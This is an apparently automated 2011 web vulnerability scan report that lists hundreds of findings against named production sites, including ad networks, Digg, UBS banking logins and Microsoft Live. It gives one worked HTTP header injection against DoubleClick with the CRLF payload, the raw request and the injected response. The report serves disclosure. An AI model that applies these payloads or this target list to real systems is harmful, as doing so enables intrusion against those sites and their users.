XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 07092011-01

Report generated by XSS.CX at Sat Jul 09 06:00:32 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |

Loading

1. HTTP header injection

1.1. http://ad.doubleclick.net/ad/bzj.techflash/home_page [REST URL parameter 1]

1.2. http://ad.doubleclick.net/adi/N3285.google/B2343920.122 [REST URL parameter 1]

2. Cross-site scripting (reflected)

2.1. http://ad.doubleclick.net/adi/N3285.google/B2343920.122 [adurl parameter]

2.2. http://ad.doubleclick.net/adi/N3285.google/B2343920.122 [ai parameter]

2.3. http://ad.doubleclick.net/adi/N3285.google/B2343920.122 [client parameter]

2.4. http://ad.doubleclick.net/adi/N3285.google/B2343920.122 [num parameter]

2.5. http://ad.doubleclick.net/adi/N3285.google/B2343920.122 [sig parameter]

2.6. http://ad.doubleclick.net/adi/N3285.google/B2343920.122 [sz parameter]

2.7. http://adonmax.com/afr.php [campaignid parameter]

2.8. http://adonmax.com/afr.php [name of an arbitrarily supplied request parameter]

2.9. http://adonmax.com/favicon.ico [REST URL parameter 1]

2.10. http://api.mixpanel.com/track/ [callback parameter]

2.11. http://api.viximo.com/api/v3/publishers/bebo.json [callback parameter]

2.12. https://blog.metricstream.com/ [name of an arbitrarily supplied request parameter]

2.13. http://cdnt.meteorsolutions.com/api/ie8_email [id parameter]

2.14. http://cdnt.meteorsolutions.com/api/ie8_email [jsonp parameter]

2.15. http://digg.com/ [name of an arbitrarily supplied request parameter]

2.16. http://digg.com/ajax/submit/crawl [REST URL parameter 1]

2.17. http://digg.com/ajax/submit/crawl [REST URL parameter 2]

2.18. http://digg.com/ajax/submit/crawl [REST URL parameter 3]

2.19. http://digg.com/login [REST URL parameter 1]

2.20. http://digg.com/register [REST URL parameter 1]

2.21. http://digg.com/search [REST URL parameter 1]

2.22. http://digg.com/submit [REST URL parameter 1]

2.23. http://digg.com/topic [REST URL parameter 1]

2.24. http://digg.com/upcoming [REST URL parameter 1]

2.25. http://jqueryui.com/themeroller/ [bgColorActive parameter]

2.26. http://jqueryui.com/themeroller/ [bgColorContent parameter]

2.27. http://jqueryui.com/themeroller/ [bgColorDefault parameter]

2.28. http://jqueryui.com/themeroller/ [bgColorError parameter]

2.29. http://jqueryui.com/themeroller/ [bgColorHeader parameter]

2.30. http://jqueryui.com/themeroller/ [bgColorHighlight parameter]

2.31. http://jqueryui.com/themeroller/ [bgColorHover parameter]

2.32. http://jqueryui.com/themeroller/ [bgColorOverlay parameter]

2.33. http://jqueryui.com/themeroller/ [bgColorShadow parameter]

2.34. http://jqueryui.com/themeroller/ [bgImgOpacityActive parameter]

2.35. http://jqueryui.com/themeroller/ [bgImgOpacityContent parameter]

2.36. http://jqueryui.com/themeroller/ [bgImgOpacityDefault parameter]

2.37. http://jqueryui.com/themeroller/ [bgImgOpacityError parameter]

2.38. http://jqueryui.com/themeroller/ [bgImgOpacityHeader parameter]

2.39. http://jqueryui.com/themeroller/ [bgImgOpacityHighlight parameter]

2.40. http://jqueryui.com/themeroller/ [bgImgOpacityHover parameter]

2.41. http://jqueryui.com/themeroller/ [bgImgOpacityOverlay parameter]

2.42. http://jqueryui.com/themeroller/ [bgImgOpacityShadow parameter]

2.43. http://jqueryui.com/themeroller/ [bgTextureActive parameter]

2.44. http://jqueryui.com/themeroller/ [bgTextureContent parameter]

2.45. http://jqueryui.com/themeroller/ [bgTextureDefault parameter]

2.46. http://jqueryui.com/themeroller/ [bgTextureError parameter]

2.47. http://jqueryui.com/themeroller/ [bgTextureHeader parameter]

2.48. http://jqueryui.com/themeroller/ [bgTextureHighlight parameter]

2.49. http://jqueryui.com/themeroller/ [bgTextureHover parameter]

2.50. http://jqueryui.com/themeroller/ [bgTextureOverlay parameter]

2.51. http://jqueryui.com/themeroller/ [bgTextureShadow parameter]

2.52. http://jqueryui.com/themeroller/ [borderColorActive parameter]

2.53. http://jqueryui.com/themeroller/ [borderColorContent parameter]

2.54. http://jqueryui.com/themeroller/ [borderColorDefault parameter]

2.55. http://jqueryui.com/themeroller/ [borderColorError parameter]

2.56. http://jqueryui.com/themeroller/ [borderColorHeader parameter]

2.57. http://jqueryui.com/themeroller/ [borderColorHighlight parameter]

2.58. http://jqueryui.com/themeroller/ [borderColorHover parameter]

2.59. http://jqueryui.com/themeroller/ [cornerRadius parameter]

2.60. http://jqueryui.com/themeroller/ [cornerRadiusShadow parameter]

2.61. http://jqueryui.com/themeroller/ [fcActive parameter]

2.62. http://jqueryui.com/themeroller/ [fcContent parameter]

2.63. http://jqueryui.com/themeroller/ [fcDefault parameter]

2.64. http://jqueryui.com/themeroller/ [fcError parameter]

2.65. http://jqueryui.com/themeroller/ [fcHeader parameter]

2.66. http://jqueryui.com/themeroller/ [fcHighlight parameter]

2.67. http://jqueryui.com/themeroller/ [fcHover parameter]

2.68. http://jqueryui.com/themeroller/ [ffDefault parameter]

2.69. http://jqueryui.com/themeroller/ [fsDefault parameter]

2.70. http://jqueryui.com/themeroller/ [fwDefault parameter]

2.71. http://jqueryui.com/themeroller/ [iconColorActive parameter]

2.72. http://jqueryui.com/themeroller/ [iconColorContent parameter]

2.73. http://jqueryui.com/themeroller/ [iconColorDefault parameter]

2.74. http://jqueryui.com/themeroller/ [iconColorError parameter]

2.75. http://jqueryui.com/themeroller/ [iconColorHeader parameter]

2.76. http://jqueryui.com/themeroller/ [iconColorHighlight parameter]

2.77. http://jqueryui.com/themeroller/ [iconColorHover parameter]

2.78. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter]

2.79. http://jqueryui.com/themeroller/ [offsetLeftShadow parameter]

2.80. http://jqueryui.com/themeroller/ [offsetTopShadow parameter]

2.81. http://jqueryui.com/themeroller/ [opacityOverlay parameter]

2.82. http://jqueryui.com/themeroller/ [opacityShadow parameter]

2.83. http://jqueryui.com/themeroller/ [thicknessShadow parameter]

2.84. http://js.revsci.net/gateway/gw.js [csid parameter]

2.85. http://s.bebo.com/c/Site/_default.css [REST URL parameter 2]

2.86. http://s.bebo.com/c/Site/_default.css [REST URL parameter 2]

2.87. http://s.bebo.com/c/Site/_default.css [REST URL parameter 2]

2.88. http://s.bebo.com/c/Site/_default.css [REST URL parameter 2]

2.89. http://s.bebo.com/c/Site/_default.css [REST URL parameter 3]

2.90. http://s.bebo.com/c/Site/_default.css [REST URL parameter 3]

2.91. http://s.bebo.com/c/Site/_default.css [REST URL parameter 3]

2.92. http://s.bebo.com/c/site/index20_script.js [REST URL parameter 2]

2.93. http://s.bebo.com/c/site/index20_script.js [REST URL parameter 2]

2.94. http://s.bebo.com/c/site/index20_script.js [REST URL parameter 2]

2.95. http://s.bebo.com/c/site/index20_script.js [REST URL parameter 2]

2.96. http://s.bebo.com/c/site/index20_script.js [REST URL parameter 3]

2.97. http://s.bebo.com/c/site/index20_script.js [REST URL parameter 3]

2.98. http://s.bebo.com/c/site/index20_script.js [REST URL parameter 3]

2.99. http://s.bebo.com/c/site/index20_script.js [REST URL parameter 3]

2.100. http://medienfreunde.com/lab/innerfade/ [Referer HTTP header]

3. Flash cross-domain policy

3.1. http://ad.doubleclick.net/crossdomain.xml

3.2. http://adx.adnxs.com/crossdomain.xml

3.3. http://bp.specificclick.net/crossdomain.xml

3.4. http://core.insightexpressai.com/crossdomain.xml

3.5. http://ecn.dev.virtualearth.net/crossdomain.xml

3.6. http://idcs.interclick.com/crossdomain.xml

3.7. http://rs.gwallet.com/crossdomain.xml

3.8. http://bstats.adbrite.com/crossdomain.xml

3.9. http://cdn.stumble-upon.com/crossdomain.xml

3.10. http://feeds.bbci.co.uk/crossdomain.xml

3.11. http://googleads.g.doubleclick.net/crossdomain.xml

3.12. http://newsrss.bbc.co.uk/crossdomain.xml

3.13. http://api.twitter.com/crossdomain.xml

4. Silverlight cross-domain policy

4.1. http://ad.doubleclick.net/clientaccesspolicy.xml

4.2. http://ecn.dev.virtualearth.net/clientaccesspolicy.xml

4.3. http://profile.live.com/clientaccesspolicy.xml

5. Cleartext submission of password

5.1. http://digg.com/

5.2. http://digg.com/login

5.3. http://digg.com/login

5.4. http://digg.com/register

5.5. http://digg.com/register

5.6. http://digg.com/search

5.7. http://digg.com/submit

5.8. http://digg.com/topic

5.9. http://digg.com/upcoming

5.10. http://manage.softlayer.mobi/

6. SSL cookie without secure flag set

6.1. https://accountservices.passport.net/gethip.srf

6.2. https://ebanking.ubs.com/en/

6.3. https://live.zune.net/xweb/passport/bottomCB.aspx

6.4. https://live.zune.net/xweb/passport/rightCB.aspx

6.5. https://live.zune.net/xweb/passport/topCB.aspx

6.6. https://login.live.com/login.srf

6.7. https://login.live.com/pp1100/

6.8. https://login.live.com/ppsecure/post.srf

6.9. https://login.live.com/ppsecure/secure.srf

6.10. https://login.live.com/resetpw.srf

6.11. https://msnia.login.live.com/ppsecure/post.srf

6.12. https://quotes-public.ubs.com/

7. Session token in URL

7.1. https://manage.softlayer.com/

7.2. https://manage.softlayer.com/Sales/orderComputingInstance

7.3. https://manage.softlayer.com/index/index

8. Password field submitted using GET method

8.1. http://digg.com/

8.2. http://digg.com/login

8.3. http://digg.com/register

8.4. http://digg.com/search

8.5. http://digg.com/submit

8.6. http://digg.com/topic

8.7. http://digg.com/upcoming

9. Cookie scoped to parent domain

9.1. https://accountservices.passport.net/gethip.srf

9.2. http://api.twitter.com/1/statuses/user_timeline.json

9.3. http://c.microsoft.com/trans_pixel.aspx

9.4. http://ads.revsci.net/adserver/ako

9.5. http://ads.revsci.net/adserver/ako

9.6. http://adx.adnxs.com/mapuid

9.7. http://b.scorecardresearch.com/b

9.8. http://b.scorecardresearch.com/p

9.9. http://bs.serving-sys.com/BurstingPipe/adServer.bs

9.10. http://bs.serving-sys.com/BurstingPipe/adServer.bs

9.11. http://bstats.adbrite.com/adserver/behavioral-data/0

9.12. http://cang.baidu.com/do/add

9.13. http://clk.atdmt.com/MRT/go/285207471/direct/01/

9.14. http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/4325897289836481830/mchpid/4/url/

9.15. https://ebanking.ubs.com/en/

9.16. http://ib.adnxs.com/seg

9.17. http://idcs.interclick.com/Segment.aspx

9.18. http://js.revsci.net/gateway/gw.js

9.19. http://leadback.advertising.com/adcedge/lb

9.20. https://live.zune.net/xweb/passport/bottomCB.aspx

9.21. https://live.zune.net/xweb/passport/rightCB.aspx

9.22. https://live.zune.net/xweb/passport/topCB.aspx

9.23. http://m.adnxs.com/msftcookiehandler

9.24. https://msnia.login.live.com/ppsecure/post.srf

9.25. http://p.brilig.com/contact/bct

9.26. http://pix04.revsci.net/D08734/a1/0/0/0.gif

9.27. http://pix04.revsci.net/G10937/a4/0/0/0.302

9.28. http://pix04.revsci.net/K08784/b3/0/3/1008211/203785884.js

9.29. http://pix04.revsci.net/K08784/b3/0/3/1008211/223509117.js

9.30. http://pixel.quantserve.com/pixel

9.31. http://pixel.quantserve.com/pixel/p-5eu58oSpL1cEs.gif

9.32. http://profile.live.com/badge/

9.33. https://quotes-public.ubs.com/

9.34. https://quotes-public1.ubs.com/app/CGT/Workbench/wb/home

9.35. https://quotes-public1.ubs.com/app/CGT/Workbench/wb/lang/de

9.36. https://quotes-public1.ubs.com/app/CGT/Workbench/wb/lang/en

9.37. https://quotes-public1.ubs.com/app/CGT/Workbench/wb/lang/fr

9.38. https://quotes-public1.ubs.com/app/CGT/Workbench/wb/lang/it

9.39. http://r.turn.com/r/beacon

9.40. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC80/rnd/999

9.41. http://rs.gwallet.com/r1/pixel/x1094

9.42. http://rs.gwallet.com/r1/pixel/x1225

9.43. http://rs.gwallet.com/r1/pixel/x368

9.44. http://rs.gwallet.com/r1/pixel/x369

10. Cookie without HttpOnly flag set

10.1. http://about.digg.com/

10.2. http://about.digg.com/ads

10.3. http://about.digg.com/blog

10.4. http://about.digg.com/contact

10.5. http://about.digg.com/faq

10.6. http://about.digg.com/partnership

10.7. http://about.digg.com/privacy

10.8. http://about.digg.com/terms-use

10.9. https://accountservices.passport.net/gethip.srf

10.10. http://c.microsoft.com/trans_pixel.aspx

10.11. http://developers.digg.com/

10.12. http://jobs.digg.com/

10.13. http://knowledgelayer.softlayer.com/

10.14. https://nae.ubs.com/awu/help/inter/en/ubsHelp.htm

10.15. https://nae.ubs.com/quotes

10.16. https://nae.ubs.com/quotes/markets_instruments

10.17. http://ping.fm/ref/

10.18. http://ad.yieldmanager.com/pixel

10.19. http://adonmax.com/afr.php

10.20. http://ads.revsci.net/adserver/ako

10.21. http://ads.revsci.net/adserver/ako

10.22. http://b.scorecardresearch.com/b

10.23. http://b.scorecardresearch.com/p

10.24. http://bs.serving-sys.com/BurstingPipe/adServer.bs

10.25. http://bs.serving-sys.com/BurstingPipe/adServer.bs

10.26. http://bstats.adbrite.com/adserver/behavioral-data/0

10.27. http://cang.baidu.com/do/add

10.28. http://clk.atdmt.com/MRT/go/285207471/direct/01/

10.29. http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/4325897289836481830/mchpid/4/url/

10.30. http://delicious.com/save

10.31. http://digg.com/

10.32. http://digg.com/upcoming

10.33. http://friendfeed.com/share

10.34. http://idcs.interclick.com/Segment.aspx

10.35. http://js.revsci.net/gateway/gw.js

10.36. http://leadback.advertising.com/adcedge/lb

10.37. https://live.zune.net/xweb/passport/bottomCB.aspx

10.38. https://live.zune.net/xweb/passport/rightCB.aspx

10.39. https://live.zune.net/xweb/passport/topCB.aspx

10.40. https://login.live.com/login.srf

10.41. https://login.live.com/pp1100/

10.42. https://login.live.com/ppsecure/post.srf

10.43. https://login.live.com/ppsecure/secure.srf

10.44. https://login.live.com/resetpw.srf

10.45. http://m.webtrends.com/dcs1syazm89k7m2op08jll1k8_9j1d/dcs.gif

10.46. http://m.webtrends.com/dcs4vy72r99k7mykw0ttxzctv_9i1o/dcs.gif

10.47. http://m.webtrends.com/dcs55hahh00000c9vfc2qpg8w_5e9d/dcs.gif

10.48. http://m.webtrends.com/dcsqv1k1u100004v2eennc1xv_9v6o/dcs.gif

10.49. https://msnia.login.live.com/ppsecure/post.srf

10.50. http://p.brilig.com/contact/bct

10.51. http://pinpoint.microsoft.com/en-US/Default.aspx

10.52. http://pix04.revsci.net/D08734/a1/0/0/0.gif

10.53. http://pix04.revsci.net/G10937/a4/0/0/0.302

10.54. http://pix04.revsci.net/K08784/b3/0/3/1008211/203785884.js

10.55. http://pix04.revsci.net/K08784/b3/0/3/1008211/223509117.js

10.56. http://pixel.quantserve.com/pixel

10.57. http://pixel.quantserve.com/pixel/p-5eu58oSpL1cEs.gif

10.58. http://profile.live.com/badge/

10.59. http://promote.orkut.com/preview

10.60. https://quotes-public.ubs.com/

10.61. https://quotes-public1.ubs.com/app/CGT/Workbench/

10.62. https://quotes-public1.ubs.com/app/CGT/Workbench/wb/home

10.63. https://quotes-public1.ubs.com/app/CGT/Workbench/wb/lang/de

10.64. https://quotes-public1.ubs.com/app/CGT/Workbench/wb/lang/en

10.65. https://quotes-public1.ubs.com/app/CGT/Workbench/wb/lang/fr

10.66. https://quotes-public1.ubs.com/app/CGT/Workbench/wb/lang/it

10.67. https://quotes-public1.ubs.com/app/CGT/Workbench/wb/pageGroup/wb_pg_mi

10.68. http://r.turn.com/r/beacon

10.69. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC80/rnd/999

10.70. http://rs.gwallet.com/r1/pixel/x1094

10.71. http://rs.gwallet.com/r1/pixel/x1225

10.72. http://rs.gwallet.com/r1/pixel/x368

10.73. http://rs.gwallet.com/r1/pixel/x369

11. Password field with autocomplete enabled

11.1. https://clientlogin.ibb.ubs.com/login

11.2. http://digg.com/

11.3. http://digg.com/login

11.4. http://digg.com/login

11.5. http://digg.com/register

11.6. http://digg.com/register

11.7. http://digg.com/search

11.8. http://digg.com/submit

11.9. http://digg.com/submit

11.10. http://digg.com/submit

11.11. http://digg.com/topic

11.12. http://digg.com/upcoming

11.13. https://foton-ewm-es.ubs.com/safe-login/Login

11.14. https://fundgate.ubs.com/GIS/Default.aspx

11.15. https://manage.softlayer.com/

11.16. https://manage.softlayer.com/Sales/orderComputingInstance

11.17. https://manage.softlayer.com/index/index

11.18. http://manage.softlayer.mobi/

11.19. https://onlineservices.ubs.com/olsauth/ex/pbl/lo

11.20. https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/dfp

11.21. https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/dfu

11.22. https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/dfu

11.23. https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/dl

11.24. https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/pfu

11.25. https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/pfu

11.26. https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/pl

12. Source code disclosure

13. Referer-dependent response

14. Cross-domain POST

14.1. https://accountservices.passport.net/uiresetpw.srf

14.2. https://blog.metricstream.com/

14.3. https://login.live.com/resetpw.srf

14.4. https://login.live.com/resetpw.srf

15. Cross-domain Referer leakage

15.1. https://accountservices.passport.net/gethip.srf

15.2. https://accountservices.passport.net/uiresetpw.srf

15.3. http://ad.doubleclick.net/adi/N3285.google/B2343920.122

15.4. http://ad.doubleclick.net/adj/bzj.techflash/

15.5. http://ad.doubleclick.net/adj/bzj.techflash/

15.6. http://ad.doubleclick.net/adj/bzj.techflash/home_page

15.7. http://ad.doubleclick.net/adj/bzj.techflash/home_page

15.8. http://adonmax.com/afr.php

15.9. http://bcp.crwdcntrl.net/px

15.10. http://bp.specificclick.net/

15.11. http://cm.g.doubleclick.net/pixel

15.12. http://cm.g.doubleclick.net/pixel

15.13. http://digg.com/submit

15.14. http://go.microsoft.com/fwlink/

15.15. http://googleads.g.doubleclick.net/pagead/ads

15.16. http://jqueryui.com/themeroller/

15.17. http://live.zune.net/signin.ashx

15.18. http://live.zune.net/signin.ashx

15.19. http://live.zune.net/signin.ashx

15.20. https://login.live.com/login.srf

15.21. https://login.live.com/ppsecure/post.srf

15.22. http://p.brilig.com/contact/bct

15.23. http://pinpoint.microsoft.com/en-US/Default.aspx

15.24. http://promote.orkut.com/preview

15.25. http://pubads.g.doubleclick.net/gampad/ads

15.26. http://pubads.g.doubleclick.net/gampad/ads

15.27. http://pubads.g.doubleclick.net/gampad/ads

15.28. http://s.bebo.com/c/site/index20_script.js

15.29. http://s.bebo.com/js/mediaboxAdv-1.3.4b.js

16. Cross-domain script include

16.1. http://about.digg.com/

16.2. http://about.digg.com/ads

16.3. http://about.digg.com/blog

16.4. http://about.digg.com/contact

16.5. http://about.digg.com/faq

16.6. http://about.digg.com/partnership

16.7. http://about.digg.com/privacy

16.8. http://about.digg.com/terms-use

16.9. http://ad.doubleclick.net/adi/N3285.google/B2343920.122

16.10. http://analytics.microsoft.com/Sync.html

16.11. http://analytics.msn.com/Include.html

16.12. http://bcp.crwdcntrl.net/px

16.13. https://blog.metricstream.com/

16.14. http://blog.softlayer.com/

16.15. http://blogs.technet.com/b/microsoft_blog/archive/2011/07/05/microsoft-releases-new-threat-data-on-rustock.aspx

16.16. http://blogs.technet.com/b/microsoft_on_the_issues/archive/2010/12/10/microsoft-adds-new-defendant-in-click-laundering-lawsuit.aspx

16.17. http://blogs.technet.com/b/microsoft_on_the_issues/archive/2011/03/17/taking-down-botnets-microsoft-and-the-rustock-botnet.aspx

16.18. http://developers.digg.com/

16.19. http://digg.com/

16.20. http://digg.com/login

16.21. http://digg.com/register

16.22. http://digg.com/search

16.23. http://digg.com/submit

16.24. http://digg.com/topic

16.25. http://digg.com/upcoming

16.26. http://docs.jquery.com/Tutorials:Introducing_$(document

16.27. http://docs.jquery.com/UI

16.28. http://docs.jquery.com/UI/Accordion

16.29. http://docs.jquery.com/UI/Effects/

16.30. http://docs.jquery.com/UI/Effects/Slide

16.31. http://googleads.g.doubleclick.net/pagead/ads

16.32. http://jobs.digg.com/

16.33. http://jquery.com/

16.34. http://jquery.malsup.com/cycle/

16.35. http://jqueryui.com/about

16.36. http://jqueryui.com/themeroller/

16.37. http://malsup.com/jquery/cycle/

16.38. http://medienfreunde.com/lab/innerfade/

16.39. http://pubads.g.doubleclick.net/gampad/ads

16.40. http://pubads.g.doubleclick.net/gampad/ads

17. TRACE method is enabled

17.1. http://bp.specificclick.net/

17.2. http://cdn1.diggstatic.com/

17.3. http://crl.globalsign.net/

17.4. http://digg.com/

18. Email addresses disclosed

18.1. http://about.digg.com/privacy

18.2. http://about.digg.com/terms-use

18.3. http://blogs.technet.com/b/microsoft_on_the_issues/archive/2011/03/17/taking-down-botnets-microsoft-and-the-rustock-botnet.aspx

18.4. http://blogs.technet.com/utility/js/omni_rsid_technet_current.js

18.5. http://bstats.adbrite.com/adserver/behavioral-data/0

18.6. http://cdn1.viximo.com/api_assets/ca02f696b/javascripts/api/v3/vixui.js

18.7. https://foton-ewm-es.ubs.com/safe-login/Login

18.8. http://jqueryui.com/about

18.9. https://login.live.com/login.srf

18.10. https://login.live.com/pp1100/

18.11. https://login.live.com/ppsecure/post.srf

18.12. https://login.live.com/ppsecure/secure.srf

18.13. https://manage.softlayer.com/

18.14. https://manage.softlayer.com/Sales/orderComputingInstance

18.15. https://manage.softlayer.com/index/index

18.16. https://msnia.login.live.com/ppsecure/post.srf

18.17. https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/dna

18.18. https://onlineservices.ubs.com/olsauth/public/SE/OLS/_security.jsp

18.19. https://onlineservices.ubs.com/olsauth/public/SE/OLS/customerPrivacy37.jsp

18.20. https://onlineservices.ubs.com/olsauth/public/SE/OLS/importantLegalInformation.jsp

18.21. https://onlineservices.ubs.com/olsauth/public/SE/OLS/noticeforNonUSInvestors.jsp

18.22. https://onlineservices.ubs.com/olsauth/public/SE/OLS/onlinePrivacy37.jsp

18.23. https://onlineservices.ubs.com/olsauth/public/SE/OLS/privacyStatement37.jsp

18.24. https://onlineservices.ubs.com/olsauth/public/SE/OLS/security.jsp

18.25. https://onlineservices.ubs.com/staticfiles/olspages/documents/viewPrint.html

18.26. http://s.bebo.com/js/mootools-core-and-more-1.3.js

19. Private IP addresses disclosed

19.1. http://digg.com/

19.2. http://digg.com/ajax/submit/crawl

19.3. http://digg.com/login

19.4. http://digg.com/register

19.5. http://digg.com/search

19.6. http://digg.com/submit

19.7. http://digg.com/submit

19.8. http://digg.com/submit

19.9. http://digg.com/submit

19.10. http://digg.com/topic

19.11. http://digg.com/upcoming

20. Credit card numbers disclosed

21. Robots.txt file

21.1. http://ad.doubleclick.net/adi/N3285.google/B2343920.122

21.2. http://api.twitter.com/receiver.html

21.3. http://cdn.stumble-upon.com/css/global_su.css

21.4. http://crl.globalsign.net/Root.crl

21.5. http://digg.com/submit

21.6. http://feeds.bbci.co.uk/news/rss.xml

21.7. http://googleads.g.doubleclick.net/pagead/ads

21.8. https://login.live.com/login.srf

21.9. https://manage.softlayer.com/Sales/orderComputingInstance

21.10. http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml

21.11. http://profile.live.com/badge/

22. Cacheable HTTPS response

22.1. https://blog.metricstream.com/

22.2. https://clientlogin.ibb.ubs.com/AuthSSO/html/clientservices.html

22.3. https://clientlogin.ibb.ubs.com/AuthSSO/html/request_login.html

22.4. https://clientlogin.ibb.ubs.com/AuthSSO/html/securityguidelines.html

22.5. https://live.zune.net/xweb/passport/leftCB.aspx

22.6. https://login.live.com/pp1100/RDHelper_JS.srf

22.7. https://manage.softlayer.com/

22.8. https://manage.softlayer.com/Sales/orderComputingInstance

22.9. https://manage.softlayer.com/favicon.ico

22.10. https://manage.softlayer.com/index/index

22.11. https://nae.ubs.com/app/RKC/1/ACEUrlDispatcherWeb/Dispatch

22.12. https://nae.ubs.com/cache/app/RKC/1/ACEUrlDispatcherWeb/Dispatch

22.13. https://nae.ubs.com/favicon.ico

22.14. https://onesource.ubs.com/

22.15. https://onlineservices.ubs.com/

22.16. https://onlineservices.ubs.com/favicon.ico

22.17. https://onlineservices.ubs.com/olsauth/ex/pbl/lo

22.18. https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/dfp

22.19. https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/dfu

22.20. https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/dl

22.21. https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/pfu

22.22. https://onlineservices.ubs.com/olsauth/ex/pbl/ubso/pl

22.23. https://onlineservices.ubs.com/olsauth/public/SE/OLS/_security.jsp

22.24. https://onlineservices.ubs.com/olsauth/public/SE/OLS/customerPrivacy37.jsp

22.25. https://onlineservices.ubs.com/olsauth/public/SE/OLS/importantLegalInformation.jsp

22.26. https://onlineservices.ubs.com/olsauth/public/SE/OLS/noticeforNonUSInvestors.jsp

22.27. https://onlineservices.ubs.com/olsauth/public/SE/OLS/onlinePrivacy37.jsp

22.28. https://onlineservices.ubs.com/olsauth/public/SE/OLS/privacyStatement37.jsp

22.29. https://onlineservices.ubs.com/olsauth/public/SE/OLS/security.jsp

22.30. https://onlineservices.ubs.com/staticfiles/olspages/adobe/AdvisoryAndBrokerageServices.pdf

22.31. https://onlineservices.ubs.com/staticfiles/olspages/documents/viewPrint.html

22.32. https://onlineservices.ubs.com/staticfiles/pws/adobe/StatementofFinancialCondition.pdf

23. HTML does not specify charset

23.1. http://ad.doubleclick.net/adi/N3285.google/B2343920.122

23.2. http://analytics.microsoft.com/Sync.html

23.3. http://analytics.msn.com/Include.html

23.4. http://bs.serving-sys.com/BurstingPipe/adServer.bs

23.5. https://fundgate.ubs.com/GIS/Default.aspx

23.6. http://jqueryui.com/about

23.7. http://jqueryui.com/themeroller/

23.8. https://nae.ubs.com/awu/help/inter/en/ubsHelp.htm

23.9. https://nae.ubs.com/quotes

23.10. https://nae.ubs.com/quotes/markets_instruments

23.11. https://onesource.ubs.com/

23.12. https://onlineservices.ubs.com/staticfiles/olspages/documents/viewPrint.html

23.13. http://p.brilig.com/contact/bct

23.14. http://pixel.invitemedia.com/data_sync

24. HTML uses unrecognised charset

24.1. http://adonmax.com/afr.php

24.2. http://cang.baidu.com/do/add

25. Content type incorrectly stated

25.1. http://a0.twimg.com/profile_images/534697216/MoMA_Twitter_Icon4_normal.gif

25.2. http://a1.twimg.com/profile_images/336090389/CM_linkedin_normal.gif

25.3. https://accountservices.passport.net/gethip.srf

25.4. http://api.mixpanel.com/track/

25.5. http://blogs.technet.com/b/microsoft_blog/archive/2011/07/05/microsoft-releases-new-threat-data-on-rustock.aspx

25.6. http://bs.serving-sys.com/BurstingPipe/adServer.bs

25.7. https://login.live.com/pp1100/RDHelper_JS.srf

25.8. https://manage.softlayer.com/favicon.ico

25.9. https://nae.ubs.com/cache/app/RKC/1/ACEUrlDispatcherWeb/styles/nav_bottom_left.jpg

25.10. https://nae.ubs.com/cache/app/RKC/1/ACEUrlDispatcherWeb/styles/nav_top_left.jpg

25.11. https://nae.ubs.com/favicon.ico

25.12. http://s.bebo.com/js/mootools-core-and-more-1.3.js

26. Content type is not specified

26.1. https://ebanking-us.ubs.com/safeloginu/Login

26.2. https://foton-ewm-de.ubs.com/safe-login/Login

26.3. https://foton-ewm-es.ubs.com/safe-login/Login

26.4. https://login.live.com/hiphelp.srf

27. SSL certificate

27.1. https://clientlogin.ibb.ubs.com/

27.2. https://login.live.com/

27.3. https://manage.softlayer.com/

27.4. https://onlineservices.ubs.com/



1. HTTP header injection  next
There are 2 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


1.1. http://ad.doubleclick.net/ad/bzj.techflash/home_page [REST URL parameter 1]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/bzj.techflash/home_page

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 49448%0d%0a875587022d3 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /49448%0d%0a875587022d3/bzj.techflash/home_page;beh=;pos=but3;vs=commercial;sz=125x125;kw=seattle;ord=1309960820 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://techflash.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/49448
875587022d3
